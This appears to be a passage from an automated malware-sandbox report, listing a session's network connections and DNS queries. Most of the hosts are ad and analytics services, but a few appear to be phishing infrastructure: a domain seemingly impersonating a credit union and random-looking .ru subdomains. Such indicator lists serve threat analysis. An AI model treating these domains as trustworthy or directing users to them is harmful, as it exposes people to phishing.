Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: global trafficDNS traffic detected: DNS query: webhosting.icicidirect.com
Source: global trafficDNS traffic detected: DNS query: firstontario.athrikasih.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: 9wetjda.niavereinho.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: tizlpdgtz5pneyh34h3ymwgjoq8v30ywsdaz1rkwez9asac8a7c1dxyoy.tubeawelm.ru
Source: global trafficDNS traffic detected: DNS query: yahoo.com
Source: global trafficDNS traffic detected: DNS query: www.yahoo.com
Source: global trafficDNS traffic detected: DNS query: s.yimg.com
Source: global trafficDNS traffic detected: DNS query: geo.yahoo.com
Source: global trafficDNS traffic detected: DNS query: geo.query.yahoo.com
Source: global trafficDNS traffic detected: DNS query: search.yahoo.com
Source: global trafficDNS traffic detected: DNS query: consent.cmp.oath.com
Source: global trafficDNS traffic detected: DNS query: edge-mcdn.secure.yahoo.com
Source: global trafficDNS traffic detected: DNS query: guce.yahoo.com
Source: global trafficDNS traffic detected: DNS query: udc.yahoo.com
Source: global trafficDNS traffic detected: DNS query: securepubads.g.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: cdn.taboola.com
Source: global trafficDNS traffic detected: DNS query: trc.taboola.com
Source: global trafficDNS traffic detected: DNS query: opus.analytics.yahoo.com
Source: global trafficDNS traffic detected: DNS query: beacon.taboola.com
Source: global trafficDNS traffic detected: DNS query: ups.analytics.yahoo.com
Source: global trafficDNS traffic detected: DNS query: gps-aa.ybp.yahoo.com
Source: global trafficDNS traffic detected: DNS query: pm-widget.taboola.com
Source: global trafficDNS traffic detected: DNS query: pa.ybp.yahoo.com
Source: global trafficDNS traffic detected: DNS query: gum.criteo.com
Source: global trafficDNS traffic detected: DNS query: pbs.yahoo.com
Source: global trafficDNS traffic detected: DNS query: idx.liadm.com
Source: global trafficDNS traffic detected: DNS query: api.taboola.com
Source: global trafficDNS traffic detected: DNS query: tlx.3lift.com
Source: global trafficDNS traffic detected: DNS query: hbopenbid.pubmatic.com
Source: global trafficDNS traffic detected: DNS query: htlb.casalemedia.com
Source: global trafficDNS traffic detected: DNS query: ads.yieldmo.com
Source: global trafficDNS traffic detected: DNS query: fastlane.rubiconproject.com
Source: global trafficDNS traffic detected: DNS query: display.bidder.taboola.com
Source: global trafficDNS traffic detected: DNS query: bidder.criteo.com
Source: global trafficDNS traffic detected: DNS query: prebid.media.net
Source: global trafficDNS traffic detected: DNS query: rtb.openx.net
Source: global trafficDNS traffic detected: DNS query: c2shb-oao.ssp.yahoo.com
Source: global trafficDNS traffic detected: DNS query: rp.liadm.com
Source: global trafficDNS traffic detected: DNS query: video-api.yql.yahoo.com
Source: global trafficDNS traffic detected: DNS query: tsdtocl.com
Source: global trafficDNS traffic detected: DNS query: ap.lijit.com
Source: global trafficDNS traffic detected: DNS query: u.openx.net
Source: global trafficDNS traffic detected: DNS query: ce.lijit.com
Source: global trafficDNS traffic detected: DNS query: dpm.demdex.net
Source: global trafficDNS traffic detected: DNS query: uipglob.semasio.net
Source: global trafficDNS traffic detected: DNS query: tags.bluekai.com
Source: global trafficDNS traffic detected: DNS query: aa.agkn.com
Source: global trafficDNS traffic detected: DNS query: sync-tm.everesttech.net
Source: global trafficDNS traffic detected: DNS query: pr-bh.ybp.yahoo.com
Source: global trafficDNS traffic detected: DNS query: s.amazon-adsystem.com
Source: global trafficDNS traffic detected: DNS query: match.adsrvr.org
Source: global trafficDNS traffic detected: DNS query: cm.g.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: images.taboola.com
Source: global trafficDNS traffic detected: DNS query: uipus.semasio.net
Source: global trafficDNS traffic detected: DNS query: cms.analytics.yahoo.com
Source: global trafficDNS traffic detected: DNS query: ads.rubiconproject.com
Source: global trafficDNS traffic detected: DNS query: ssbsync.smartadserver.com
Source: global trafficDNS traffic detected: DNS query: t.adx.opera.com
Source: global trafficDNS traffic detected: DNS query: creativecdn.com
Source: global trafficDNS traffic detected: DNS query: cms.quantserve.com
Source: global trafficDNS traffic detected: DNS query: s.ad.smaato.net
Source: global trafficDNS traffic detected: DNS query: sync.serverbid.com
Source: global trafficDNS traffic detected: DNS query: ads.pubmatic.com
Source: global trafficDNS traffic detected: DNS query: v-a5qcx9czh0.wc.yahoodns.net
Source: global trafficDNS traffic detected: DNS query: v-bnmvrl70mr.wc.yahoodns.net
Source: global trafficDNS traffic detected: DNS query: v-cn0b8nwv37.wc.yahoodns.net
Source: global trafficDNS traffic detected: DNS query: pips.taboola.com
Source: global trafficDNS traffic detected: DNS query: us-u.openx.net
Source: global trafficDNS traffic detected: DNS query: dns-lzsg3je5p.sombrero.yahoo.net
Source: global trafficDNS traffic detected: DNS query: cerebro.edna.yahoo.net
Source: global trafficDNS traffic detected: DNS query: osmxq05cx.wc.06yahoo.com
Source: global trafficDNS traffic detected: DNS query: 5k2ttewqa.wc.06yahoo.com
Source: global trafficDNS traffic detected: DNS query: cds.taboola.com
Source: global trafficDNS traffic detected: DNS query: smarttag.rubiconproject.com
Source: global trafficDNS traffic detected: DNS query: ssum-sec.casalemedia.com
Source: global trafficDNS traffic detected: DNS query: um.simpli.fi
Source: global trafficDNS traffic detected: DNS query: pixel-us-east.rubiconproject.com
Source: global trafficDNS traffic detected: DNS query: yahoo-bidout-d.openx.net
Source: global trafficDNS traffic detected: DNS query: contextual.media.net
Source: global trafficDNS traffic detected: DNS query: js-sec.indexww.com
Source: global trafficDNS traffic detected: DNS query: eus.rubiconproject.com
Source: global trafficDNS traffic detected: DNS query: eb2.3lift.com
Source: global trafficDNS traffic detected: DNS query: image6.pubmatic.com
Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global trafficDNS traffic detected: DNS query: pixel-sync.sitescout.com
Source: global trafficDNS traffic detected: DNS query: pixel.tapad.com
Source: global trafficDNS traffic detected: DNS query: ib.adnxs.com
Source: global trafficDNS traffic detected: DNS query: ad.turn.com
Source: global trafficDNS traffic detected: DNS query: prebid.a-mo.net
Source: global trafficDNS traffic detected: DNS query: beacon-ams3.rubiconproject.com
Source: global trafficDNS traffic detected: DNS query: px.ads.linkedin.com
Source: global trafficDNS traffic detected: DNS query: sync.srv.stackadapt.com
Source: global trafficDNS traffic detected: DNS query: s.update.rubiconproject.com
Source: global trafficDNS traffic detected: DNS query: dis.criteo.com
Source: global trafficDNS traffic detected: DNS query: aax-eu.amazon-adsystem.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50730
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50693 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50211 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 50578 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50745
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50747
Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50740
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50741
Source: unknownNetwork traffic detected: HTTP traffic on port 50325 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50600 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50292 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 50738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50758
Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50464 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50750
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50752
Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 50439 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50768
Source: unknownNetwork traffic detected: HTTP traffic on port 50280 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50760
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50762
Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50761
Source: unknownNetwork traffic detected: HTTP traffic on port 50337 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50612 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50763
Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50566 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 50235 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50510 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 50783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50591 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50301 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50700
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50702
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50701
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 50656 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50705
Source: unknownNetwork traffic detected: HTTP traffic on port 50522 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50370 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50407 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50708
Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50710
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 50313 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50716
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50719
Source: unknownNetwork traffic detected: HTTP traffic on port 50534 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50718
Source: unknownNetwork traffic detected: HTTP traffic on port 50808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50496 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 50771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50728
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50720
Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 50369 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50337
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50336
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50339
Source: unknownNetwork traffic detected: HTTP traffic on port 50386 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50338
Source: unknownNetwork traffic detected: HTTP traffic on port 50546 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50331
Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50330
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50333
Source: unknownNetwork traffic detected: HTTP traffic on port 50632 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50332
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50335
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50334
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50305 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50348
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50347
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50349
Source: unknownNetwork traffic detected: HTTP traffic on port 50505 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50340
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50341
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50344
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50343
Source: unknownNetwork traffic detected: HTTP traffic on port 50243 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50346
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50345
Source: unknownNetwork traffic detected: HTTP traffic on port 50673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50197 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50359
Source: unknownNetwork traffic detected: HTTP traffic on port 50804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50351
Source: unknownNetwork traffic detected: HTTP traffic on port 50317 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50350
Source: unknownNetwork traffic detected: HTTP traffic on port 50558 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50353
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50352
Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50355
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50354
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50357
Source: unknownNetwork traffic detected: HTTP traffic on port 50374 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50360
Source: unknownNetwork traffic detected: HTTP traffic on port 50620 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50419 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50369
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 50255 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 50685 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50362
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50361
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50364
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50363
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50365
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50367
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50370
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50778
Source: unknownNetwork traffic detected: HTTP traffic on port 50571 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50770
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50775
Source: unknownNetwork traffic detected: HTTP traffic on port 50350 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50267 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50697 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50607 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50362 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50444 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50304
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50303
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50305
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50789
Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50308
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50307
Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50780
Source: unknownNetwork traffic detected: HTTP traffic on port 50702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50300
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50302
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50786
